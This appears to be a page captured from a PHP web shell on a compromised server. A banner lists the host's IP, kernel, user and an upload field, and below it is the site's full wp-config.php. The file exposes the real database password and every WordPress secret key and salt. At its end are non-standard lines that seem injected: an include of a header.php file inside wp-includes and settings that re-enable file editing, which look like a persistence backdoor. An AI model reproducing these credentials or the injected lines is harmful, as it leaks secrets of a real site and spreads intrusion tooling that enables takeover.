| Server IP : 216.106.184.20 / Your IP : 216.73.216.234 Web Server : LiteSpeed System : Linux asmodeus.in-hell.com 5.14.0-570.58.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Oct 29 06:24:11 EDT 2025 x86_64 User : sekoaid1 ( 1891) PHP Version : 7.3.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/sekoaid1/public_html/ |
Upload File : |
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'sekoaid1_wp338' );
/** MySQL database username */
define( 'DB_USER', 'sekoaid1_wp338' );
/** MySQL database password */
define( 'DB_PASSWORD', 'ESS8p8(4-6' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', 'gpix7txywuqmgpom5tw3egnc6g9vbtufcne1clktvuwlyrl9qtupwelgu2niwvax' );
define( 'SECURE_AUTH_KEY', '1iganboigw9dwon2nwt1ehtoas6wcdscxhygkgccwdtg9dvf8huvrdk8op9eeds7' );
define( 'LOGGED_IN_KEY', 'lvmcpzg1n8pvuceersvnitiadkm5zbhsswgoz8tvihucybo4bfti5ne0i0kforiy' );
define( 'NONCE_KEY', 'whmdtreegdpm5yove1wjbo2y8iimd4mhtbfq7flztkfosy8le7ijjhrud9gbekll' );
define( 'AUTH_SALT', '35btgczjf9uf4yqess5xqea4jlyiqq1hcorus1p2v2tvigk7r6mx6ivmj7kitr7r' );
define( 'SECURE_AUTH_SALT', 'hegdroatysvlkk46cq6llqowlh5bjiama1uh7ud2wmalevojixsbhwgqbht9ffny' );
define( 'LOGGED_IN_SALT', 'hchql2upokf5feverypdvenvtyrcqb98jv4ugb9wuepfgvsvkdoq9enubfky4v4w' );
define( 'NONCE_SALT', 'qlforwoazvpvmuviixpikgy0xfhaoqv4oi2enzdkbsaoasfuc6cpxtldwv3fbh92' );
/**#@-*/
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp0x_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/
define( 'WP_DEBUG', false );
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
include_once(ABSPATH . WPINC . '/header.php');
define('DISALLOW_FILE_EDIT', false);
define('DISALLOW_FILE_MODS', false);